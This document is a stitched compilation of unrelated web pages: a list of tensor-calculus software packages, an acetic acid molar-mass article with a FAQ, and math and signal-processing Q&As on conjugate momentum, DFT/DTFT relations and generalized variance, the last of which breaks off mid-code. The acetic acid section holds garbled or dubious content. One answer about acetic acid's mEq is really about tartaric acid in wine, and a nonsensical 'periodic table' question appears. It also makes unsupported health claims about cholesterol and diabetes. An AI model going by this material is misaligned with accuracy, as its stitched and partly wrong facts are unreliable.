EDC and RGTC, i.e. Riemannian Geometry & Tensor Calculus @ Mathematica; link: http://www.inp.demokritos.gr/~sbonano/RGTC/
• Download all files – compressed: .sit format (100 KB), .zip format (135 KB)
• Uncompressed files (~1000 KB): RGTC.nb — OperatorPLT.nb — NPsymbolPLT.nb — EDCRGTCcode.m. (Only the combined EDC and RGTC code in package format is included — it must be placed in an appropriate directory.)
• Note: RGTC cannot be used for calculations with abstract tensors (manipulation of tensor expressions with abstract indices). It only operates on explicit tensors (nested lists of components which are functions of the coordinates). For abstract calculations try the package xTensor.
Additional Examples can be found here.
## Standalone software
• SPLATT[1] is an open source software package for high-performance sparse tensor factorization. SPLATT ships a stand-alone executable, a C/C++ library, and an Octave/MATLAB API.
• Cadabra[2] is a computer algebra system (CAS) designed specifically for the solution of problems encountered in field theory. It has extensive functionality for tensor polynomial simplification including multi-term symmetries, fermions and anti-commuting variables, Clifford algebras and Fierz transformations, implicit coordinate dependence, multiple index types and many more. The input format is a subset of TeX. Both a command-line and a graphical interface are available.
• Tela[3] is a software package similar to Matlab and (GNU) Octave, but designed specifically for tensors.
## Software for use with Mathematica
• Tensor[4] is a tensor package written for the Mathematica system. It provides many functions relevant for General Relativity calculations in general Riemann-Cartan geometries.
• Ricci[5] is a system for Mathematica 2.x and later for doing basic tensor analysis, available for free.
• TTC[6] Tools of Tensor Calculus is a Mathematica package for doing tensor and exterior calculus on differentiable manifolds.
• EDC and RGTC,[7] “Exterior Differential Calculus” and “Riemannian Geometry & Tensor Calculus,” are free Mathematica packages for tensor calculus especially designed but not only for general relativity.
• Tensorial[8] “Tensorial 4.0” is a general purpose tensor calculus package for Mathematica.
• xAct:[9] Efficient Tensor Computer Algebra for Mathematica. xAct is a collection of packages for fast manipulation of tensor expressions.
• GREAT[10] is a free package for Mathematica that computes the Christoffel connection and the basic tensors of General Relativity from a given metric tensor.
• Atlas 2 for Mathematica[11] is a powerful Mathematica toolbox which allows one to do a wide range of modern differential geometry calculations.
• GRTensorM[12] is a computer algebra package for performing calculations in the general area of differential geometry.
• MathGR[13] is a package to manipulate tensor and GR calculations with either abstract or explicit indices, simplify tensors with permutational symmetries, decompose tensors from abstract indices to partially or completely explicit indices and convert partial derivatives into total derivatives.
• TensoriaCalc[14] is a tensor calculus package written for Mathematica 9 and higher, aimed at providing user-friendly functionality and a smooth consistency with the Mathematica language itself. As of January 2015, given a metric and the coordinates used, TensoriaCalc can compute Christoffel symbols, the Riemann curvature tensor, and Ricci tensor/scalar; it allows for user-defined tensors and is able to perform basic operations such as taking the covariant derivatives of tensors. TensoriaCalc is continuously under development due to time constraints faced by its inventor/developer.
## Software for use with Maple
• GRTensorII[15] is a computer algebra package for performing calculations in the general area of differential geometry.
• Atlas 2 for Maple[16] is a modern differential geometry package for Maple.
• DifferentialGeometry[17] is a package which performs fundamental operations of calculus on manifolds, differential geometry, tensor calculus, General Relativity, Lie algebras, Lie groups, transformation groups, jet spaces, and the variational calculus. It is included with Maple.
## Software for use with Maxima
Maxima[23] is a free open source general purpose computer algebra system which includes several packages for tensor algebra calculations in its core distribution. It is particularly useful for calculations with abstract tensors, i.e., when one wishes to do calculations without defining all components of the tensor explicitly. It comes with three tensor packages:[24]
• itensor for abstract (indicial) tensor manipulation,
• ctensor for component-defined tensors, and
• atensor for algebraic tensor manipulation.
## Software for use with R
• Tensor[25] is an R package for basic tensor operations.
• rTensor[26] provides several tensor decomposition approaches.
• tensorBF[27] is an R package for Bayesian Tensor decomposition.
• MTF[28] Bayesian Multi-Tensor Factorization for data fusion and Bayesian versions of Tensor PCA and Tensor CCA. Software: MTF
## Libraries
• Redberry[29] is an open source computer algebra system designed for symbolic tensor manipulation. Redberry provides common tools for expression manipulation, generalized on tensorial objects, as well as tensor-specific features: indices symmetries, LaTeX-style input, natural dummy indices handling, multiple index types etc. The HEP package includes tools for Feynman diagrams calculation: Dirac and SU(N) algebra, Levi-Civita simplifications, tools for calculation of one-loop counterterms etc. Redberry is written in Java and provides extensive Groovy-based programming language.
• libxm[30] is a lightweight distributed-parallel tensor library written in C.
• FTensor[31] is a high performance tensor library written in C++.
• TL[32] is a multi-threaded tensor library implemented in C++ used in Dynare++. The library allows for folded/unfolded, dense/sparse tensor representations, general ranks (symmetries). The library implements Faa Di Bruno formula and is adaptive to available memory. Dynare++ is a standalone package solving higher order Taylor approximations to equilibria of non-linear stochastic models with rational expectations.
• vmmlib[33] is a C++ linear algebra library that supports 3-way tensors, emphasizing computation and manipulation of several tensor decompositions.
• Spartns[34] is a Sparse Tensor framework for Common Lisp.
• FAstMat[35] is a thread-safe general tensor algebra library written in C++ and specially designed for FEM/FVM/BEM/FDM element/edge wise computations.
• Cyclops Tensor Framework [36] is a distributed memory library for efficient decomposition of tensors of arbitrary type and parallel MPI+OpenMP execution of tensor contractions/functions.
• TiledArray[37] is a scalable, block-sparse tensor library that is designed to aid in rapid composition of high-performance algebraic tensor equation. It is designed to scale from a single multicore computer to a massively-parallel, distributed-memory system.
• libtensor [38] is a set of performance linear tensor algebra routines for large tensors found in post-Hartree-Fock methods in quantum chemistry.
• ITensor [39] features automatic contraction of matching tensor indices. It is written in C++ and has higher-level features for quantum physics algorithms based on tensor networks.
• Fastor [40] is a high performance C++ tensor algebra library that supports tensors of arbitrary dimension and all possible contractions and permutations thereof. It employs compile-time graph search optimisations to find the optimal contraction sequence between an arbitrary number of tensors in a network. It has high-level domain-specific features for solving nonlinear multiphysics problems using FEM.
• Xerus [41] is a C++ tensor algebra library for tensors of arbitrary dimensions and tensor decomposition into general tensor networks (focusing on matrix product states). It offers Einstein notation like syntax and optimizes the contraction order of any network of tensors at runtime so that dimensions need not be fixed at compile-time.
## Solving a univariate polynomial equation with Mathematica
15000*(1+x)^10=20000
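This is a compound-interest problem, and besides a call such as Solve[15000 (1 + x)^10 == 20000, x, Reals], the real root can be written in closed form:

$$(1+x)^{10} = \frac{20000}{15000} = \frac{4}{3} \quad\Longrightarrow\quad x = \left(\frac{4}{3}\right)^{1/10} - 1 \approx 0.0292,$$

i.e., an interest rate of about 2.92% per period.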
|
# Molar Mass of Acetic Acid
Let us look at the molar mass of acetic acid. The bottle of food vinegar that you can find in almost any kitchen contains, alongside acetic acid, a number of other acids and vitamins. A few drops of it give cooked food and salads a pleasantly sharper taste. Yet few of us really think about the properties and the actual range of applications of its main ingredient, acetic acid.
• Formula: CH₃COOH
• Molar Mass of Acetic Acid: 60.052 g/mol
• IUPAC ID: Acetic acid
• Density: 1.05 g/cm³
• Boiling point: 244.4°F (118°C)
• Melting point: 61.88°F (16.6°C)
• Classification: Carboxylic acid
## What is this substance?
Acetic acid has the formula CH3COOH, which places it among the fatty carboxylic acids. The presence of a carboxyl group (COOH) makes it a monobasic acid. The substance occurs in nature in organic form and is also obtained artificially in laboratories. The acid is the simplest, but no less important, representative of its series; it is easily soluble in water and hygroscopic.
The physical properties of acetic acid, including its density, vary with temperature. At room temperature (20°C) the acid is in the liquid state, with a density of 1.05 g/cm³. It has a specific odor and a sour taste. A solution of the substance without impurities hardens into crystals at temperatures below 17°C. Boiling begins at temperatures above 118°C. Acetic acid is obtained from the interaction of alcohol with oxygen: the fermentation of alcoholic substances and carbohydrates, and the souring of wines.
### A bit of history
Vinegar was the first acid of the series to be discovered, and its discovery happened in stages. From the 8th century, Arab scientists began to extract acetic acid by distillation. However, even in ancient Rome this substance, derived from sour wine, was used as a universal sauce. Its name in Ancient Greek translates as “sour”. In the 17th century, scientists in Europe managed to extract the substance in pure form. At that time its formula was obtained, and an unusual property was found: in the vapor state, acetic acid ignites with a blue flame.
Until the 19th century, scientists knew acetic acid only in organic form, as part of compounds of salts and esters: in the composition of plants and their fruits (apples, grapes), and in the bodies of humans and animals (sweat secretions, bile). At the beginning of the 20th century, Russian scientists accidentally obtained acetaldehyde from the reaction of acetylene with mercury oxide. Today the consumption of acetic acid is so great that it is produced mainly synthetically.
### Production methods
Whether acetic acid is obtained pure or with impurities in solution depends on the method of extraction. Edible acetic acid is obtained by a biochemical method, in the process of ethanol fermentation. In industry, several methods of extracting the acid are used, as a rule reactions at high temperature in the presence of a catalyst:
• Carbonylation of methanol (reaction with carbon monoxide)
• Oxidation of the oil fraction with oxygen
• Pyrolysis of wood
• Oxidation of acetaldehyde with oxygen
The industrial route is more efficient and economical than the biochemical one. Thanks to the industrial method, the volume of production of acetic acid has grown hundreds of times in the 20th and 21st centuries compared to the 19th century. Today, the synthesis of acetic acid by carbonylation of methanol provides more than 50% of the total amount produced.
## Physical properties of acetic acid and its effect on the indicator
In the liquid state, acetic acid is colorless. Its acidity level (pH 2.4) is easily tested with litmus paper: acetic acid turns the indicator red. The physical properties of acetic acid vary widely. When the temperature drops below 16°C, the substance takes on a solid form and resembles small ice crystals. It readily dissolves in water and mixes with a wide range of solvents, except hydrogen sulfide. Acetic acid reduces the total volume of the liquid when diluted with water.
The substance ignites at a temperature of 455°C, releasing 876 kJ/mol of heat. The molar mass is 60.05 g/mol. As an electrolyte, acetic acid is weak; its permittivity is 6.15 at room temperature. The boiling point, like the density, is a pressure-dependent quantity: at a pressure of 40 mm Hg, boiling begins at a temperature of about 42°C, while at a pressure of 100 mm Hg, boiling occurs only at 62°C.
## Chemical Properties
In reactions with metals and oxides, the substance shows its acidic properties. Dissolving more complex compounds, the acid forms salts called acetates: magnesium, potassium, and lead acetate, etc. The pKa value of the acid is 4.75.
When interacting with halogen gases, vinegar enters substitution reactions, with the subsequent formation of more complex acids: chloroacetic, iodoacetic. Dissolving in water, the acid dissociates with the release of acetate ions and hydrogen protons. The degree of dissociation is 0.4 percent.
In crystalline form, acetic acid molecules form dimers through hydrogen bonds. In addition, the acid is needed in the biosynthesis of more complex fatty acids, steroids, and sterols.
## Lab Test
Acetic acid in solution can be detected through its physical properties, for example its odor. It is enough to add a stronger acid to a solution of its salt, which will displace the acetic acid and release its vapors. By laboratory distillation of sodium acetate (CH3COONa) with H2SO4 it is possible to obtain acetic acid in dry form.
Consider an experiment from the grade 8 school chemistry course. The physical properties of acetic acid are clearly demonstrated by a dissolution reaction: it is enough to add copper oxide to a solution of the substance and heat it gently. The oxide dissolves completely, forming a colored solution.
### Derivatives
Reactions of the substance with many compounds form esters, amides, and salts. However, in the manufacture of other substances, the requirements on acetic acid remain high: it must dissolve well and contain no third-party impurities.
Depending on the concentration of the aqueous solution, acetic acid goes by different names. A concentration above 96% is called glacial acetic acid. Acetic acid at 70-80%, which can be purchased in grocery stores, is called acetic essence. Table vinegar has a concentration of 3-9%.
### Acetic acid and everyday life
In addition to its uses in food, acetic acid has a number of physical properties thanks to which mankind has found applications for it in everyday life. A solution of the substance at low concentration easily removes plaque from the surface of metal products, mirrors, and windows. Its ability to absorb moisture also plays a useful role. Vinegar removes odors in rooms well, and removes stains from vegetables and fruits on clothes.
As it turns out, one physical property of acetic acid, its ability to remove fat from surfaces, finds application in folk medicine and cosmetology. A mild solution of edible vinegar is rubbed into the hair to give it shine. The substance is widely used in folk remedies for colds and against skin fungus. The use of vinegar in cosmetic wraps to fight cellulite is gaining momentum.
## Use in Production
As a component of salts and other complex substances, acetic acid is an essential element in many industries:
• Pharmaceutical industry for making: aspirin, antiseptic and antibacterial ointments, phenacetin.
• Manufacture of synthetic fibres. Non-combustible films, cellulose acetate.
• Food industry: for preservation (as food additive E260) and the preparation of marinades and sauces.
• Textile industry: it is a component of dyes.
• Manufacture of cosmetics and hygiene products: aromatic oils, creams to improve skin tone.
• Agriculture: as an insecticide and against weeds.
• Varnish manufacturing. Technical solvents, acetone production.
Production of acetic acid increases every year. Its volume worldwide today exceeds 400 thousand tons per month. The acid is delivered in reinforced steel tanks. Due to the high physical and chemical activity of acetic acid, its storage in plastic containers is restricted, or limited to several months, in many production facilities.
### Security
Acetic acid of high concentration is a class 3 flammable substance and releases toxic fumes. It is recommended to wear gas masks and other personal protective equipment when working with the acid. The lethal dose for the human body starts from 20 ml. When swallowed, the acid first burns the mucous membranes and then affects other organs. In such cases, immediate hospitalization is required.
If the acid gets on exposed areas of the skin, it is advisable to immediately wash them with running water. Surface burns with the acid can cause tissue necrosis, which requires hospitalization.
## Interesting facts
Physiologists have found that a person can do entirely without acetic acid as a food additive, although within the body the substance itself is indispensable. However, with acid intolerance, as well as with stomach problems, acetic acid as a food additive is contraindicated.
• Acetic acid is used in book printing.
• The substance was found in small amounts in honey, banana and wheat.
• If you shake a cooled container of acetic acid, you can watch it congeal sharply.
• A small concentration of acetic acid can reduce symptoms of pain from an insect bite, as well as minor burns.
• The intake of food products with a low content of acetic acid reduces the level of cholesterol in the body. The substance also stabilizes blood sugar well in diabetics.
• The use of protein and carbohydrate food together with a small amount of acetic acid enhances their digestibility by the body.
• If a dish is too salty, add a few drops of vinegar to smooth out the saltiness.
### Finally
Acetic acid has been used for millennia because its physical and chemical properties find application at every step: hundreds of possible reactions, thousands of useful substances toward which humanity moves. The main thing is to know all the features of acetic acid, its positive and negative properties.
Do not forget about the benefits, but always remember what harm careless handling of acetic acid of high concentration can cause. In its danger, it stands alongside hydrochloric and sulfuric acids. Always remember safety when using the acid. Dilute the essence with water properly and carefully.
### What is the molar mass of acetic acid in grams?
60.05 g·mol⁻¹
#### What is the molecular mass of CH3COOH in U?
60.06 g/mol (Molar mass of CH3COOH = 60.06 g/mol )
#### What is the equivalent weight of CH3COOH?
24.02 (two C) + 4.032 (four H) + 32 (two O) = 60.05 g/mol. Equivalent weight of acetic acid: E = 60 ÷ 1 = 60 (the molecular weight of acetic acid is 60 and it has one replaceable hydrogen).
#### What is the mass percentage of CH3COOH?
Percentage Composition by Element
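The composition figures can be recomputed from standard atomic masses; a small Python sketch (values hard-coded here for illustration):

```python
# Percent composition of CH3COOH (C2H4O2) from standard atomic masses
masses = {"C": 12.011, "H": 1.008, "O": 15.999}
formula = {"C": 2, "H": 4, "O": 2}

molar_mass = sum(masses[el] * n for el, n in formula.items())
print(f"molar mass = {molar_mass:.3f} g/mol")        # ≈ 60.052 g/mol

for el, n in formula.items():
    print(f"{el}: {100 * masses[el] * n / molar_mass:.2f}%")
    # C ≈ 40.00%, H ≈ 6.71%, O ≈ 53.28%
```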
### What is the equivalent weight of acetic acid*?
60 u of acetic acid contains one replaceable hydrogen. Thus, the equivalent weight of acetic acid is 60 u.
### What is the mass of acetic acid present in 0.1 mole of it?
0.1 mol × 60 g/mol = 6.0 g. Thus, option $3)\ 6.0\ \mathrm{g}$ will be the correct answer.
### Why is acetic acid written as CH3COOH?
A chemical formula of a compound represents the chemical nature of the compound. Since acetic acid is an organic acid that contains the -COOH group, the chemical formula must include this group. … Therefore, the correct formula for acetic acid is CH3COOH.
### What is the N factor of CH3COOH?
The n factor of CH3COOH is 1 .
### What type of compound is CH3COOH?
A carboxylic acid
Acetic acid is an organic compound with the formula CH3COOH. It is a carboxylic acid containing a methyl group attached to a carboxyl functional group.
### What is the basicity of acetic acid?
There are 4 hydrogen atoms present in the acetic acid molecule, with only one replaceable hydrogen present. Hence, giving only one ionizable H+ ion, its basicity is 1. So we can determine that the basicity of acetic acid is 1 because it releases one hydrogen ion in an aqueous solution.
### What is the mEq of acetic acid?
Milliequivalents (mEq) are equal to mass/1000, so 1.00 mEq = 75.0435/1000 = 0.075 g/L of tartaric acid. The maximum volatile acidity, calculated as acetic acid, is 0.14 g per 100 ml for natural red wines and 0.12 g/100 ml for other wines.
#### What is the normality of 10% acetic acid?
Acetic acid has the chemical formula CH3CO2H. In the case of acetic acid, a 1 N solution is equal to a 1 M solution. Therefore, the normality of 10% acetic acid as calculated would be 1.67 N.
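As a check, assuming 10% here means 10 g of acid per 100 mL of solution:

$$N = \frac{100\ \mathrm{g/L}}{60.05\ \mathrm{g/mol}} \times 1 \approx 1.67\ \mathrm{N}$$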
### What is the mass percentage of CH3COOH in vinegar?
Vinegar is 5.0% acetic acid, CH3COOH, by mass.
### How many Molar Mass of Acetic Acid (CH3COOH)?
It consists of two carbon (C) atoms, four hydrogen (H) atoms and two oxygen (O) atoms . Hope this will help you.
### What is the equivalent weight of H3PO4?
The equivalent weight of H3PO4 is 49.
### How is equal weight calculated?
Equivalent Weight = Molecular Weight / Valency
### What is N-Factor?
For bases, the n-factor is defined as the number of OH- ions replaced by 1 mole of the base in a reaction. Note that the n-factor is not necessarily equal to its acidity, i.e. the number of moles of OH- ions present in 1 mole of the base. For example, the n-factor of NaOH = 1, and the n-factor of Zn(OH)2 = 1 or 2.
### How do you make a solution of 1 molar acetic acid?
To make a 1 M solution of acetic acid, dissolve 60.05 g of acetic acid in about 500 mL of distilled or deionized water in a 1-L volumetric flask, then fill to the mark. Since acetic acid is a liquid, the acid can also be measured by volume: divide the mass of the acid by its density (1.049 g/mL) to determine the volume (57.24 mL).
### How do you make 50 mM acetic acid?
You can create this buffer in the following ways:
1. Dissolve 2.87 ml of glacial acetic acid in 375 ml of water; or
2. Dissolve 1.84 ml of glacial acetic acid and 1.48 g of sodium acetate in 350 ml of water and confirm the pH with a pH meter.
### What is the pH of 0.1 M acetic acid?
2.87. Acetic acid with a molar concentration of 0.1 M has a pH of 2.87, and 0.0001 M acetic acid has a pH of 4.3.
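This value follows from the weak-acid approximation with $K_a \approx 1.8\times10^{-5}$:

$$[\mathrm{H^+}] \approx \sqrt{K_a C} = \sqrt{1.8\times10^{-5} \times 0.1} \approx 1.34\times10^{-3}\ \mathrm{M}, \qquad \mathrm{pH} = -\log_{10}[\mathrm{H^+}] \approx 2.87$$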
### What is the molecular geometry of CH3COOH?
tetrahedral
We have to first draw the Lewis structure of acetic acid. Around the methyl carbon, four atoms are directly linked and there are no lone pairs. Its electron geometry and its molecular geometry are both tetrahedral, like that of methane.
### What does CH3COOH mean?
Acetic acid (CH3COOH), also known as ethanoic acid, is the most important of the carboxylic acids. A dilute (about 5 percent by volume) solution of acetic acid produced by fermentation and oxidation of natural carbohydrates is called vinegar; a salt, ester, or acyl derivative of acetic acid is called an acetate.
### What does CH3COOH mean on the periodic table?
Vinegar Acid | CH3COOH – PubChem.
### What is the value of N factor in acetic acid?
For acid-base reactions, the n-factor of acetic acid is 1, since it has only one replaceable hydrogen (see above).
### What is molecular weight and equivalent weight?
The key difference between gram molecular weight and gram equivalent weight is that the term gram molecular weight means the mass of a molecule in grams, which is numerically equal to the molecular weight of that substance, whereas the term gram equivalent weight refers to the mass of one equivalent in grams.
### What is the chemical formula of acetic acid?
Acetic Acid / Formula
Acetic acid, systematically named ethanoic acid, is an acidic, colorless liquid and organic compound with the chemical formula CH3COOH (also written CH3CO2H, C2H4O2, or HC2H3O2).
### Is CH3COOH an acid or a base?
A weak acid (such as CH3COOH) is in equilibrium with its anion in water, and its conjugate (CH3COO-, a weak base) is likewise in equilibrium in water.
### Is CH3COOH a carbohydrate?
general formula of carbohydrates
Let’s take a look at acetic acid, which is CH3COOH. Although it fits the general formula of carbohydrates, i.e. Cx(H2O)y, we know that acetic acid is not a carbohydrate. Formaldehyde (HCHO) also falls under this general formula, but it is not a carbohydrate either.
|
# Definition of conjugate momentum on a manifold
I have trouble understanding this definition:
Let $$Q$$ be some manifold and $$L: TQ \to \mathbb{R}$$ a smooth function. Then for some local coordinates $$(q, \dot{q})$$ on $$TQ$$ the conjugate momentum is defined as $$\frac{\partial L}{\partial \dot{q}}$$, which is an element of the cotangent bundle $$T^{*}Q$$.
How is the expression $$\frac{\partial L}{\partial \dot{q}}$$ to be interpreted? If one simply expresses $$L$$ in local coordinates by $$L \circ(q^{-1}, \dot{q}^{-1}): \mathbb{R}^{2n} \to \mathbb{R}$$ and differentiates it with respect to the second variable, one gets a function $$\mathbb{R}^n \to \mathbb{R}$$ and not an element of the cotangent bundle $$T^{*}Q$$. Is the correct expression $$\partial_2 ( L \circ(q^{-1}, \dot{q}^{-1}))\circ (q, \dot{q}) \in T^{*}Q\ ?$$
• yes, the issue is that the derivatives you get away from $0 \in \Bbb R^n$ are not actually independent of the choice of local coordinates in any reasonable sense. The only invariant data is what you're writing down along the 0-section. – user98602 Dec 31 '18 at 0:39
The notation $$\partial L/\partial\dot{q}$$ is no more than a symbol that denotes the Frechet derivative of $$L$$ with respect to $$\dot{q}$$. More precisely, let $$L:Q\times TQ\to\mathbb{R}.$$ Then for all $$x\in Q$$, $$T_xQ$$ is a vector space equipped with the norm induced by the metric on $$Q$$. In this sense, one may define a bounded linear operator $$A:TQ\to\mathbb{R}$$, such that $$\lim_{Y\to 0}\frac{\left\|L(x,X+Y)-L(x,X)-A(Y)\right\|_{\mathbb{R}}}{\left\|Y\right\|_{T_xQ}}=0$$ for a given $$x\in Q$$ and a given $$X\in T_xQ$$. This linear operator $$A$$, if it exists, is called the partial derivative of $$L$$ with respect to $$X$$, also denoted by $$\partial L/\partial X$$ for intuition. Further, if one considers a trajectory $$q:\mathbb{R}\to Q$$, we have $$\dot{q}:\mathbb{R}\to T_{q}Q$$. Hence when considering the special form $$L(q,\dot{q})$$, we also take $$\partial L/\partial\dot{q}$$ instead of $$\partial L/\partial X$$, again, for intuition.
Finally, whatever the notation is assigned to the operator defined above, either $$A$$ or $$\partial L/\partial X$$ or $$\partial L/\partial\dot{q}$$, it is (1) linear and is (2) from $$TQ$$ to $$\mathbb{R}$$. On the other hand, the collection of all linear operators from $$TQ$$ to $$\mathbb{R}$$ is definitely $$T^*Q$$. Therefore, it follows that $$A\in T^*Q,\quad\text{or}\quad\frac{\partial L}{\partial X}\in T^*Q,\quad\text{or}\quad\frac{\partial L}{\partial\dot{q}}\in T^*Q.$$
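To make the coordinate picture concrete, here is a small symbolic sketch; the Lagrangian $L = \tfrac{1}{2}m\dot{q}^2 - V(q)$ is a standard textbook example, not taken from the question above:

```python
import sympy as sp

m = sp.symbols('m', positive=True)
q, qdot = sp.symbols('q qdot')        # local coordinates (q, qdot) on TQ
V = sp.Function('V')

# L(q, qdot) = (1/2) m qdot^2 - V(q), expressed in local coordinates
L = sp.Rational(1, 2) * m * qdot**2 - V(q)

p = sp.diff(L, qdot)                  # conjugate momentum dL/d(qdot)
print(p)                              # m*qdot: the covector coefficient at the point (q, qdot)
```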
|
# Link between DFS, DFT, DTFT
My understanding of DFT is as follows
For a signal $x[n]$ of finite length, the DFT is the DFS of the periodic extension, $\tilde{x}[n]$, of that signal $x[n]$; another way to view the DFT is as a sampling of the continuous DTFT.
Given that it is possible to reconstruct an original signal from a sampled signal, provided the sampling rate is greater than the Nyquist rate, we know that the DTFT of a sampled signal is a series of replications of the spectrum of the original signal at frequencies spaced by the sampling frequency. Now, since the DTFT is continuous and periodic, we can further sample the DTFT at regular intervals and still be able to reconstruct the DTFT, and consequently the original signal. This act of sampling the DTFT is called the DFT.
Is my interpretation of DFT correct? I would welcome any (true) facts or implications to test my understanding
Yes your understanding is basically correct.
The 1st paragraph (2 lines) expresses the fundamental relation between the DFS and the DFT of a finite-length sequence $x[n]$ while the 2nd paragraph tries to put down the relation between the DFT $X[k]$ of a sequence and the DTFT $X(e^{j\omega})$ of it (assuming it exists).
However this 2nd paragraph shall better be rephrased like this: given a finite length sequence $x[n]$ of length $N$ whose DTFT is:
$$X(e^{j\omega}) = \sum_{n=0}^{N-1} {x[n] e^{-j\omega n}}$$
it will have its $N$-point DFT $X[k]$ defined and computed as the uniform samples of its DTFT $X(e^{j\omega})$ taken at $N$ frequency points $\omega_k = \frac{2 \pi}{N} k$ for $k=0,1,...,N-1$ .
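A quick NumPy check of this sampling relation (an illustration, not part of the original answer):

```python
import numpy as np

N = 8
x = np.random.randn(N)                 # finite-length sequence x[n], n = 0..N-1

X_dft = np.fft.fft(x)                  # N-point DFT

# DTFT evaluated at the N uniform frequencies w_k = 2*pi*k/N
n = np.arange(N)
X_dtft = np.array([np.sum(x * np.exp(-1j * 2*np.pi*k*n/N)) for k in range(N)])

print(np.allclose(X_dft, X_dtft))      # True: the DFT equals the DTFT samples
```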
It's important to recognise that some important class of aperiodic signals which are of infinite length, such as $x[n] = a^n u[n]$, will not have a valid $N$-point DFT representation for any (finite) $N$, nor will it have a valid finite DFS representation as it's not a periodic signal. Such a signal requires infinitely many samples for its DFT to exactly represent it.
In practice, for the above sequence, a truncated (windowed) exponential can be used to approximate the infinite length sequence. For practical applications one can always find a large enough finite $N$ that will reduce the error of the approximation down to an acceptable level.
In addition, for infinite length aperiodic signals such as the above $x[n]=a^n u[n]$, whose DTFT $X(e^{j\omega})$ exists and is given by $X(e^{j\omega})= \frac{1}{1-a e^{-j\omega}}$ for some suitable $a$, one can think of the following scenario: relying on the alternate definition of the DFT $X[k]$ of a sequence as being the uniform samples of the DTFT $X(e^{j\omega})$ of that sequence $x[n]$, what happens when we take $N$ uniform samples of $X(e^{j\omega})$ as:
$$X[k] = X(e^{j\frac{2\pi k}{N}})= \frac{1}{1-a e^{-j\frac{2\pi}{N}k}} ~,~ k=0,1,...,N-1$$
And by assuming that these $N$ samples of the DTFT constitute a proper (valid) DFT representation of some $N$-point finite length sequence $x_a[n]$, we convert those $N$ DFT samples back into the time domain using the $N$-point inverse DFT.
What's the relation between the finite length sequence $x_a[n]$ (that's returned by the N-point IDFT of the N uniform samples of DTFT $X(e^{j\omega})$ of the sequence $x[n] = a^n u[n]$) and the infinite length sequence $x[n] = a^n u[n]$...?
It can be shown that $x_a[n]$ will be a time-aliased version of the infinite length signal $x[n]=a^n u[n]$, defined by the following relation:
$$x_a[n] = \sum_r { x[n-rN] } ~,~ n = 0,1,...,N-1$$
which can be viewed as one period of the periodic extension of the infinite length signal $x[n]$ with period $N$; however, the tails of $x[n]$ should sum up to finite values (converge) for $x_a[n]$ to exist. This will be the case, for example, when $|a| <1$ for the above exponential...
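For the exponential the aliased sum has the closed form $x_a[n] = a^n/(1-a^N)$, which a short NumPy experiment confirms (an illustration under the assumption $|a|<1$):

```python
import numpy as np

a, N = 0.9, 16
k = np.arange(N)
# N uniform samples of the DTFT of x[n] = a^n u[n]
X = 1.0 / (1.0 - a * np.exp(-1j * 2*np.pi*k/N))

x_a = np.fft.ifft(X).real              # N-point IDFT of the DTFT samples

n = np.arange(N)
# Time-aliased sum: sum_{r>=0} a^(n+rN) = a^n / (1 - a^N)
x_alias = a**n / (1.0 - a**N)

print(np.allclose(x_a, x_alias))       # True
```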
Furthermore, there is an important practical issue that arises when the DFT is computed through an FFT using a computer program such as MATLAB/Octave. Consider the case when an even symmetric sequence $h[n]$ has a region of support from $-M$ to $M$; let's be concrete and put $M = 2$ for simplicity and assume
$$h[n]=\delta [n+2] +2 \delta[n+1] + 3\delta[n] +2\delta [n-1] +1\delta[n-2]$$
The DTFT of such an even symmetric real sequence $h[n]$ will be real and even (hence will have zero phase), as given by:
$$H(e^{j\omega}) = \sum_{n=-2}^{2} {h[n] e^{-j\omega n}}$$
Therefore we can conclude that its $5$-point DFT $H[k]$ will also be a real, even, zero-phase sequence. Let's compute its DFT using MATLAB:
h = [1 2 3 2 1]; % The row-vector as 1x5 matrix to hold the sequence h[n]
fft(h,5) % DFT of h[n] ?
The output is :
9.0000 , -2.1180 - 1.5388i , 0.1180 + 0.3633i , 0.1180 - 0.3633i , -2.1180 + 1.5388i
This is not the expected result. The reason is that MATLAB computes not the DFT of the original sequence $h[n]$ but the DFT of a shifted version $b[n] = h[n-2]$, so that $b[n]$ is a causal sequence that begins from the index $n=0$. Using a few DTFT properties one can show that:
$$B(e^{j\omega}) = e^{-j 2\omega} H(e^{j\omega})$$
and the DFT therefore will be:
$$B[k] = e^{-j 2 \frac{2\pi}{5} k} H[k] ~,~ k=0,1,2,3,4$$
where $H[k]$ are the samples of the zero-phase DFT corresponding to the even-symmetric sequence $h[n]$, and $B[k]$ corresponds to what MATLAB computes.
If for some reason you have to recover $H[k]$ from $B[k]$, then you would compute: $$H[k] = e^{j 2 \frac{2\pi}{5} k} B[k] ~,~ k=0,1,2,3,4$$
as the following line of code reveals:
exp(j*2*pi*[0:4]*2/5).*fft([1 2 3 2 1],5) % output is :
9.0000 2.6180 0.3820 0.3820 2.6180
The same result could also be obtained by the input shifting as well:
fft([3 2 1 1 2],5)
|
# Hyperpolarization of Amino Acid Derivatives in Water for Biological Applications.
S. Wagner, S. Glöggler, Louis-S. Bouchard
We report on the successful synthesis and hyperpolarization of N-unprotected α-amino acid ethyl acrylate esters and, extensively, on an alanine derivative hyperpolarized by PHIP (4.4$\pm$1% $^{13}$C-polarization), meeting required levels for in vivo detection. Using water as solvent increases biocompatibility, and the absence of N-protection is expected to maintain biological activity.
Publisher URL: http://arxiv.org/abs/1711.01553
arXiv: 1711.01553v1
|
# Generalized variance
Generalized variance is the determinant of the correlation matrix. Does increasing the off-diagonal entries (correlation coefficients) decrease the determinant? Is a proof available? All elements are positive. Can we deduce it from the Hadamard determinant inequality?
The determinant of the covariance matrix could be considered a generalization of variance, in that it's equal to the scalar variance in the case of dimension 1. But the determinant of the correlation matrix, as opposed to the covariance matrix, is not in that sense a generalization of the variance. – Michael Hardy Aug 27 '11 at 11:46
Thanks for the proper definition. – shakera Aug 27 '11 at 12:15
It can do either. $\;$ Suppose the correlation matrix is $\begin{bmatrix} 1 & x \\ x & 1 \end{bmatrix}$.
$\operatorname{det}\left(\begin{bmatrix} 1 & x \\ x & 1 \end{bmatrix}\right) = 1\cdot 1-x\cdot x = 1-x^2$
If $x<0$ then increasing the off-diagonal entries increases the determinant.
If $0<x$ then increasing the off-diagonal entries decreases the determinant.
Thanks... Does it generalize for $N$? Let us suppose all elements of the correlation matrix are positive. – shakera Aug 27 '11 at 9:25
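For the special case of an equicorrelation matrix, where every off-diagonal entry equals $\rho > 0$, the determinant is $(1+(N-1)\rho)(1-\rho)^{N-1}$ (from the eigenvalues $1+(N-1)\rho$ and $1-\rho$), which does decrease as $\rho$ grows; a quick numerical check:

```python
import numpy as np

def equicorr(N, rho):
    """Correlation matrix with all off-diagonal entries equal to rho."""
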